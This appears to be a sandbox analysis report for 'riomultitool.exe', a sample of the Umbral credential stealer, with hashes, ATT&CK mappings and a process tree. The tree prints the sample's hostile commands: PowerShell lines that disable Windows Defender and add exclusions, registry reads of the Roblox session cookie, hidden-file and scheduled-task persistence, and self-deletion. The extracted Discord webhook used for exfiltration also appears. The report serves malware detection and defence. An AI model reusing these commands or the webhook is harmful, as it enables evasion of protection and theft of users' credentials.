umbral | c0351dccf1117ee1924671a77fa67db75d05a4be5297cee995d6ebfcb6f71587

Analysis

max time kernel
150s
max time network
120s
platform
windows7_x64
resource
win7-20240705-en
resource tags

arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
submitted
15-08-2024 19:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

riomultitool.exe
Size

557KB
MD5

903b9e6bdaf8721d44891f5da47fb6e5
SHA1

4dde5721fbba23c63bf9ca62ec93a5ad72e6789d
SHA256

c0351dccf1117ee1924671a77fa67db75d05a4be5297cee995d6ebfcb6f71587
SHA512

006c1b8d1aebbdc0217cb6c44023e8e1a9916d82fa436ac5b065443b17f13da558039fa9a432e3790e6b8bb8aa6979e14122412815d5987b9fb693bf51312927
SSDEEP

12288:PFUNDaqoZtL+EP8ty4/IuphChn6opNsie2hy:PFOauI8E4/IuphChn6opNsiHy

Score

10^/10

umbral credential_access discovery evasion execution persistence spyware stealer

Malware Config

Extracted

Family

umbral

https://discord.com/api/webhooks/1272102731623956590/orC-657JppMO4pzRWYZRPq2Bxa7aWiqEYrpgs9lbvLUqA7X_w4XsmqMix75fgCH2MVae

Signatures

Detect Umbral payload 2 IoCs

resource	yara_rule
behavioral1/files/0x0008000000016108-6.dat	family_umbral
behavioral1/memory/1896-11-0x0000000000220000-0x0000000000290000-memory.dmp	family_umbral

Modifies visiblity of hidden/system files in Explorer 2 TTPs 2 IoCs

evasion

Hidden Files and Directories

T1564.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1385883288-3042840365-2734249351-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0"	svchost.exe

Umbral
Umbral stealer is an opensource moduler stealer written in C#.
stealer umbral
Credentials from Password Stores: Credentials from Web Browsers 1 TTPs
Malicious Access or copy of Web Browser Credential store.
credential_access stealer

Credentials from Web Browsers
T1555.003

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

pid	Process
2644	powershell.exe
2428	powershell.exe
2968	powershell.exe
1472	powershell.exe

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	riomultitool.exe

Executes dropped EXE 6 IoCs

pid	Process
1896	riomultitool.exe
752	icsys.icn.exe
1932	explorer.exe
1684	spoolsv.exe
2500	svchost.exe
2364	spoolsv.exe

Loads dropped DLL 6 IoCs

pid	Process
2124	riomultitool.exe
2124	riomultitool.exe
752	icsys.icn.exe
1932	explorer.exe
1684	spoolsv.exe
2500	svchost.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

Adds Run key to start application 2 TTPs 4 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO"	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO"	explorer.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Explorer = "c:\\windows\\resources\\themes\\explorer.exe RO"	svchost.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\Svchost = "c:\\windows\\resources\\svchost.exe RO"	svchost.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
10	discord.com
9	discord.com

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
6	ip-api.com

Drops file in System32 directory 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\explorer.exe	explorer.exe
File opened for modification	C:\Windows\SysWOW64\explorer.exe	svchost.exe

Drops file in Windows directory 5 IoCs

description	ioc	Process
File opened for modification	C:\Windows\Resources\Themes\icsys.icn.exe	riomultitool.exe
File opened for modification	\??\c:\windows\resources\themes\explorer.exe	icsys.icn.exe
File opened for modification	\??\c:\windows\resources\spoolsv.exe	explorer.exe
File opened for modification	\??\c:\windows\resources\svchost.exe	spoolsv.exe
File opened for modification	C:\Windows\Resources\tjud.exe	explorer.exe

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spoolsv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	riomultitool.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	icsys.icn.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	spoolsv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

Adversaries may check for Internet connectivity on compromised systems.

discovery

Internet Connection Discovery

T1016.001

pid	Process
1476	cmd.exe
3052	PING.EXE

Detects videocard installed 1 TTPs 1 IoCs

Uses WMIC.exe to determine videocard installed.

System Information Discovery

T1082

pid	Process
2132	wmic.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3052	PING.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
2492	schtasks.exe
3024	schtasks.exe
2564	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2124	riomultitool.exe
2124	riomultitool.exe
2124	riomultitool.exe
2124	riomultitool.exe
2124	riomultitool.exe
2124	riomultitool.exe
2124	riomultitool.exe
2124	riomultitool.exe
2124	riomultitool.exe
2124	riomultitool.exe
2124	riomultitool.exe
2124	riomultitool.exe
2124	riomultitool.exe
2124	riomultitool.exe
2124	riomultitool.exe
2124	riomultitool.exe
1896	riomultitool.exe
2644	powershell.exe
2428	powershell.exe
2968	powershell.exe
2300	powershell.exe
752	icsys.icn.exe
752	icsys.icn.exe
752	icsys.icn.exe
752	icsys.icn.exe
752	icsys.icn.exe
752	icsys.icn.exe
752	icsys.icn.exe
752	icsys.icn.exe
752	icsys.icn.exe
752	icsys.icn.exe
752	icsys.icn.exe
752	icsys.icn.exe
752	icsys.icn.exe
752	icsys.icn.exe
752	icsys.icn.exe
752	icsys.icn.exe
752	icsys.icn.exe
1932	explorer.exe
1932	explorer.exe
1932	explorer.exe
1932	explorer.exe
1932	explorer.exe
1932	explorer.exe
1932	explorer.exe
1932	explorer.exe
1932	explorer.exe
1932	explorer.exe
1932	explorer.exe
1932	explorer.exe
1932	explorer.exe
1932	explorer.exe
1932	explorer.exe
1932	explorer.exe
2500	svchost.exe
2500	svchost.exe
2500	svchost.exe
2500	svchost.exe
2500	svchost.exe
2500	svchost.exe
2500	svchost.exe
2500	svchost.exe
2500	svchost.exe
2500	svchost.exe

Suspicious behavior: GetForegroundWindowSpam 2 IoCs

pid	Process
1932	explorer.exe
2500	svchost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	1896	riomultitool.exe
Token: SeIncreaseQuotaPrivilege	3064	wmic.exe
Token: SeSecurityPrivilege	3064	wmic.exe
Token: SeTakeOwnershipPrivilege	3064	wmic.exe
Token: SeLoadDriverPrivilege	3064	wmic.exe
Token: SeSystemProfilePrivilege	3064	wmic.exe
Token: SeSystemtimePrivilege	3064	wmic.exe
Token: SeProfSingleProcessPrivilege	3064	wmic.exe
Token: SeIncBasePriorityPrivilege	3064	wmic.exe
Token: SeCreatePagefilePrivilege	3064	wmic.exe
Token: SeBackupPrivilege	3064	wmic.exe
Token: SeRestorePrivilege	3064	wmic.exe
Token: SeShutdownPrivilege	3064	wmic.exe
Token: SeDebugPrivilege	3064	wmic.exe
Token: SeSystemEnvironmentPrivilege	3064	wmic.exe
Token: SeRemoteShutdownPrivilege	3064	wmic.exe
Token: SeUndockPrivilege	3064	wmic.exe
Token: SeManageVolumePrivilege	3064	wmic.exe
Token: 33	3064	wmic.exe
Token: 34	3064	wmic.exe
Token: 35	3064	wmic.exe
Token: SeIncreaseQuotaPrivilege	3064	wmic.exe
Token: SeSecurityPrivilege	3064	wmic.exe
Token: SeTakeOwnershipPrivilege	3064	wmic.exe
Token: SeLoadDriverPrivilege	3064	wmic.exe
Token: SeSystemProfilePrivilege	3064	wmic.exe
Token: SeSystemtimePrivilege	3064	wmic.exe
Token: SeProfSingleProcessPrivilege	3064	wmic.exe
Token: SeIncBasePriorityPrivilege	3064	wmic.exe
Token: SeCreatePagefilePrivilege	3064	wmic.exe
Token: SeBackupPrivilege	3064	wmic.exe
Token: SeRestorePrivilege	3064	wmic.exe
Token: SeShutdownPrivilege	3064	wmic.exe
Token: SeDebugPrivilege	3064	wmic.exe
Token: SeSystemEnvironmentPrivilege	3064	wmic.exe
Token: SeRemoteShutdownPrivilege	3064	wmic.exe
Token: SeUndockPrivilege	3064	wmic.exe
Token: SeManageVolumePrivilege	3064	wmic.exe
Token: 33	3064	wmic.exe
Token: 34	3064	wmic.exe
Token: 35	3064	wmic.exe
Token: SeDebugPrivilege	2644	powershell.exe
Token: SeDebugPrivilege	2428	powershell.exe
Token: SeDebugPrivilege	2968	powershell.exe
Token: SeDebugPrivilege	2300	powershell.exe
Token: SeIncreaseQuotaPrivilege	464	wmic.exe
Token: SeSecurityPrivilege	464	wmic.exe
Token: SeTakeOwnershipPrivilege	464	wmic.exe
Token: SeLoadDriverPrivilege	464	wmic.exe
Token: SeSystemProfilePrivilege	464	wmic.exe
Token: SeSystemtimePrivilege	464	wmic.exe
Token: SeProfSingleProcessPrivilege	464	wmic.exe
Token: SeIncBasePriorityPrivilege	464	wmic.exe
Token: SeCreatePagefilePrivilege	464	wmic.exe
Token: SeBackupPrivilege	464	wmic.exe
Token: SeRestorePrivilege	464	wmic.exe
Token: SeShutdownPrivilege	464	wmic.exe
Token: SeDebugPrivilege	464	wmic.exe
Token: SeSystemEnvironmentPrivilege	464	wmic.exe
Token: SeRemoteShutdownPrivilege	464	wmic.exe
Token: SeUndockPrivilege	464	wmic.exe
Token: SeManageVolumePrivilege	464	wmic.exe
Token: 33	464	wmic.exe
Token: 34	464	wmic.exe

Suspicious use of SetWindowsHookEx 12 IoCs

pid	Process
2124	riomultitool.exe
2124	riomultitool.exe
752	icsys.icn.exe
752	icsys.icn.exe
1932	explorer.exe
1932	explorer.exe
1684	spoolsv.exe
1684	spoolsv.exe
2500	svchost.exe
2500	svchost.exe
2364	spoolsv.exe
2364	spoolsv.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2124 wrote to memory of 1896	2124	riomultitool.exe	30
PID 2124 wrote to memory of 1896	2124	riomultitool.exe	30
PID 2124 wrote to memory of 1896	2124	riomultitool.exe	30
PID 2124 wrote to memory of 1896	2124	riomultitool.exe	30
PID 1896 wrote to memory of 3064	1896	riomultitool.exe	32
PID 1896 wrote to memory of 3064	1896	riomultitool.exe	32
PID 1896 wrote to memory of 3064	1896	riomultitool.exe	32
PID 1896 wrote to memory of 2768	1896	riomultitool.exe	35
PID 1896 wrote to memory of 2768	1896	riomultitool.exe	35
PID 1896 wrote to memory of 2768	1896	riomultitool.exe	35
PID 1896 wrote to memory of 2644	1896	riomultitool.exe	37
PID 1896 wrote to memory of 2644	1896	riomultitool.exe	37
PID 1896 wrote to memory of 2644	1896	riomultitool.exe	37
PID 1896 wrote to memory of 2428	1896	riomultitool.exe	39
PID 1896 wrote to memory of 2428	1896	riomultitool.exe	39
PID 1896 wrote to memory of 2428	1896	riomultitool.exe	39
PID 1896 wrote to memory of 2968	1896	riomultitool.exe	41
PID 1896 wrote to memory of 2968	1896	riomultitool.exe	41
PID 1896 wrote to memory of 2968	1896	riomultitool.exe	41
PID 1896 wrote to memory of 2300	1896	riomultitool.exe	43
PID 1896 wrote to memory of 2300	1896	riomultitool.exe	43
PID 1896 wrote to memory of 2300	1896	riomultitool.exe	43
PID 2124 wrote to memory of 752	2124	riomultitool.exe	45
PID 2124 wrote to memory of 752	2124	riomultitool.exe	45
PID 2124 wrote to memory of 752	2124	riomultitool.exe	45
PID 2124 wrote to memory of 752	2124	riomultitool.exe	45
PID 752 wrote to memory of 1932	752	icsys.icn.exe	46
PID 752 wrote to memory of 1932	752	icsys.icn.exe	46
PID 752 wrote to memory of 1932	752	icsys.icn.exe	46
PID 752 wrote to memory of 1932	752	icsys.icn.exe	46
PID 1932 wrote to memory of 1684	1932	explorer.exe	47
PID 1932 wrote to memory of 1684	1932	explorer.exe	47
PID 1932 wrote to memory of 1684	1932	explorer.exe	47
PID 1932 wrote to memory of 1684	1932	explorer.exe	47
PID 1684 wrote to memory of 2500	1684	spoolsv.exe	48
PID 1684 wrote to memory of 2500	1684	spoolsv.exe	48
PID 1684 wrote to memory of 2500	1684	spoolsv.exe	48
PID 1684 wrote to memory of 2500	1684	spoolsv.exe	48
PID 2500 wrote to memory of 2364	2500	svchost.exe	49
PID 2500 wrote to memory of 2364	2500	svchost.exe	49
PID 2500 wrote to memory of 2364	2500	svchost.exe	49
PID 2500 wrote to memory of 2364	2500	svchost.exe	49
PID 1932 wrote to memory of 600	1932	explorer.exe	50
PID 1932 wrote to memory of 600	1932	explorer.exe	50
PID 1932 wrote to memory of 600	1932	explorer.exe	50
PID 1932 wrote to memory of 600	1932	explorer.exe	50
PID 2500 wrote to memory of 2492	2500	svchost.exe	51
PID 2500 wrote to memory of 2492	2500	svchost.exe	51
PID 2500 wrote to memory of 2492	2500	svchost.exe	51
PID 2500 wrote to memory of 2492	2500	svchost.exe	51
PID 1896 wrote to memory of 464	1896	riomultitool.exe	53
PID 1896 wrote to memory of 464	1896	riomultitool.exe	53
PID 1896 wrote to memory of 464	1896	riomultitool.exe	53
PID 1896 wrote to memory of 652	1896	riomultitool.exe	56
PID 1896 wrote to memory of 652	1896	riomultitool.exe	56
PID 1896 wrote to memory of 652	1896	riomultitool.exe	56
PID 1896 wrote to memory of 904	1896	riomultitool.exe	58
PID 1896 wrote to memory of 904	1896	riomultitool.exe	58
PID 1896 wrote to memory of 904	1896	riomultitool.exe	58
PID 1896 wrote to memory of 1472	1896	riomultitool.exe	60
PID 1896 wrote to memory of 1472	1896	riomultitool.exe	60
PID 1896 wrote to memory of 1472	1896	riomultitool.exe	60
PID 1896 wrote to memory of 2132	1896	riomultitool.exe	62
PID 1896 wrote to memory of 2132	1896	riomultitool.exe	62

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2768	attrib.exe

C:\Users\Admin\AppData\Local\Temp\riomultitool.exe
"C:\Users\Admin\AppData\Local\Temp\riomultitool.exe"
1⤵
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2124
- \??\c:\users\admin\appdata\local\temp\riomultitool.exe
  c:\users\admin\appdata\local\temp\riomultitool.exe
  2⤵
  - Drops file in Drivers directory
  - Executes dropped EXE
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1896
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3064
- - C:\Windows\system32\attrib.exe
    "attrib.exe" +h +s "c:\users\admin\appdata\local\temp\riomultitool.exe "
    3⤵
    - Views/modifies file attributes
    PID:2768
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Add-MpPreference -ExclusionPath 'c:\users\admin\appdata\local\temp\riomultitool.exe '
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2644
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2428
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2968
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2300
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" os get Caption
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:464
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" computersystem get totalphysicalmemory
    3⤵
    PID:652
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic.exe" csproduct get uuid
    3⤵
    PID:904
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
    3⤵
    - Command and Scripting Interpreter: PowerShell
    PID:1472
- - C:\Windows\System32\Wbem\wmic.exe
    "wmic" path win32_VideoController get name
    3⤵
    - Detects videocard installed
    PID:2132
- - C:\Windows\system32\cmd.exe
    "cmd.exe" /c ping localhost && del /F /A h "c:\users\admin\appdata\local\temp\riomultitool.exe " && pause
    3⤵
    - System Network Configuration Discovery: Internet Connection Discovery
    PID:1476
  - - C:\Windows\system32\PING.EXE
      ping localhost
      4⤵
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:3052
- C:\Windows\Resources\Themes\icsys.icn.exe
  C:\Windows\Resources\Themes\icsys.icn.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Drops file in Windows directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of SetWindowsHookEx
  - Suspicious use of WriteProcessMemory
  PID:752
- - \??\c:\windows\resources\themes\explorer.exe
    c:\windows\resources\themes\explorer.exe
    3⤵
    - Modifies visiblity of hidden/system files in Explorer
    - Executes dropped EXE
    - Loads dropped DLL
    - Adds Run key to start application
    - Drops file in System32 directory
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: GetForegroundWindowSpam
    - Suspicious use of SetWindowsHookEx
    - Suspicious use of WriteProcessMemory
    PID:1932
  - - \??\c:\windows\resources\spoolsv.exe
      c:\windows\resources\spoolsv.exe SE
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Drops file in Windows directory
      System Location Discovery: System Language Discovery
      Suspicious use of SetWindowsHookEx
      Suspicious use of WriteProcessMemory
      PID:1684
    - - \??\c:\windows\resources\svchost.exe
        
        c:\windows\resources\svchost.exe
        5⤵
        Modifies visiblity of hidden/system files in Explorer
        Executes dropped EXE
        Loads dropped DLL
        Adds Run key to start application
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: GetForegroundWindowSpam
        Suspicious use of SetWindowsHookEx
        Suspicious use of WriteProcessMemory
        
        PID:2500
      - \??\c:\windows\resources\spoolsv.exe
        
        c:\windows\resources\spoolsv.exe PR
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of SetWindowsHookEx
        
        PID:2364
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 19:06 /f
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2492
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 19:07 /f
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:3024
      - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "svchost" /tr "c:\windows\resources\svchost.exe" /sc daily /st 19:08 /f
        6⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:2564
  - - C:\Windows\Explorer.exe
      C:\Windows\Explorer.exe
      4⤵
      PID:600

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

System Network Configuration Discovery

T1016

Internet Connection Discovery

T1016.001

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

Filesize
7KB

MD5
842ce2f0a836738dc50a5daec25fd79b

SHA1
4a24856c9123917dfd998e4fe37a773b1334f513

SHA256
cca1a939aefa0262c949db85f8fe03d8c57ee70841f376e5b484b15d5ff8c6e9

SHA512
d62fd6d256dc085768cb6d018304a5111ab14f1615656b2550ea9e4beb39604fd164f025c4adc9cfc85c8484e02944b7230e10f6e1607e5694de6be2ceb0eb7c

Download Submit
C:\Windows\Resources\Themes\explorer.exe

Filesize
135KB

MD5
2a7d634bf2cca9b60ba12fce12d1566d

SHA1
bba0b0c178c53149cc8cfac26012a66b5a82bd57

SHA256
8e7cd8fbf64ae1b469e6b6d844a34358fcdf9f4cd0b3ea6e2f5acc3f5a25db3c

SHA512
897017948159c4947429378ae8ed6de119c7486bb5ab9ff8e7b5428e645e54a07e93a99f54088717d62d508fd2f1831d1bf00d84e6122413ec78292827df983c

Download Submit
\Users\Admin\AppData\Local\Temp\riomultitool.exe

Filesize
422KB

MD5
8ea49a2060302a178c62b0b81071f500

SHA1
472285c12798562ccda3acba3cc1d497871d98b1

SHA256
7c6685525101dbe507d53a87e9c31a80c400f53cfb6545b762f641ba4fd886eb

SHA512
4ffb22e6d5ceaa5f568aa837d0cd475e5aeebaad6016fe30f0175d2ee15377a2aba9787f9b60611f46b1a93352a43f60cd3f0db94fce92bb3167b818b85f59a2

Download Submit
\Windows\Resources\Themes\icsys.icn.exe

Filesize
135KB

MD5
6754240aa5cd3d05747ce16f028d90f2

SHA1
63b78e0b4505317d15e6233394c003529ff724ae

SHA256
3ee5fcd138c04b04c065195685763c7912f72c3d863e49f072325f6ef3a289c4

SHA512
4fce558992982e7899e21707da76be7f117922ed5be31a0a472a724340a4c558e0acd147bf33fa13beeca8f140e56072c281004aa12d43a2e15afe3f0c2c3030

Download Submit
\Windows\Resources\spoolsv.exe

Filesize
135KB

MD5
42938515fc318bbb861596ba03d92a9f

SHA1
2d39022cb0192b5783f7674e33ffc37289630a02

SHA256
8e444d4002215293e452f03fe467c43c150918d0949fb6fb087291cc205f1b7b

SHA512
804f1da47e91144be1aec1b18443ee987a831f268e73ff8c81108d57ec8074c22ba7528e4b2f9af24f4965ce23bb00c9b7d49c6fafaddf38594dcd22d36099c4

Download Submit
\Windows\Resources\svchost.exe

Filesize
135KB

MD5
41773a5982128d5ba32284230f6065cb

SHA1
5ab84d0d7823825cea9d9e1c296cdbc59dcd41bd

SHA256
3b8baeb7e3eb4c08b7ac849fa099a0431c1094e7600ab2a6f3ec4543e24f938f

SHA512
951df5f51710fd5cc7fd24c98d5979b436d62b363fdc7460f830cc8e1257af40031a3f97465ccfd68e5400e248ad68b950baf09523dffa3949c0ff52e7275ebc

Download Submit
memory/752-53-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/752-101-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/1472-108-0x0000000002810000-0x0000000002818000-memory.dmp

Filesize
32KB

Download
memory/1472-107-0x000000001B630000-0x000000001B912000-memory.dmp

Filesize
2.9MB

Download
memory/1684-99-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/1684-85-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/1896-64-0x000007FEF5B73000-0x000007FEF5B74000-memory.dmp

Filesize
4KB

Download
memory/1896-112-0x000007FEF5B70000-0x000007FEF655C000-memory.dmp

Filesize
9.9MB

Download
memory/1896-12-0x000007FEF5B70000-0x000007FEF655C000-memory.dmp

Filesize
9.9MB

Download
memory/1896-82-0x000007FEF5B70000-0x000007FEF655C000-memory.dmp

Filesize
9.9MB

Download
memory/1896-11-0x0000000000220000-0x0000000000290000-memory.dmp

Filesize
448KB

Download
memory/1896-10-0x000007FEF5B73000-0x000007FEF5B74000-memory.dmp

Filesize
4KB

Download
memory/1932-113-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/1932-114-0x0000000000430000-0x000000000044F000-memory.dmp

Filesize
124KB

Download
memory/1932-84-0x0000000000430000-0x000000000044F000-memory.dmp

Filesize
124KB

Download
memory/2124-100-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/2124-0-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/2124-48-0x0000000000280000-0x000000000029F000-memory.dmp

Filesize
124KB

Download
memory/2364-98-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/2428-25-0x00000000028F0000-0x00000000028F8000-memory.dmp

Filesize
32KB

Download
memory/2428-24-0x000000001B5B0000-0x000000001B892000-memory.dmp

Filesize
2.9MB

Download
memory/2500-93-0x0000000000290000-0x00000000002AF000-memory.dmp

Filesize
124KB

Download
memory/2500-115-0x0000000000400000-0x000000000041F000-memory.dmp

Filesize
124KB

Download
memory/2500-116-0x0000000000290000-0x00000000002AF000-memory.dmp

Filesize
124KB

Download
memory/2644-17-0x000000001B600000-0x000000001B8E2000-memory.dmp

Filesize
2.9MB

Download
memory/2644-18-0x0000000002260000-0x0000000002268000-memory.dmp

Filesize
32KB

Download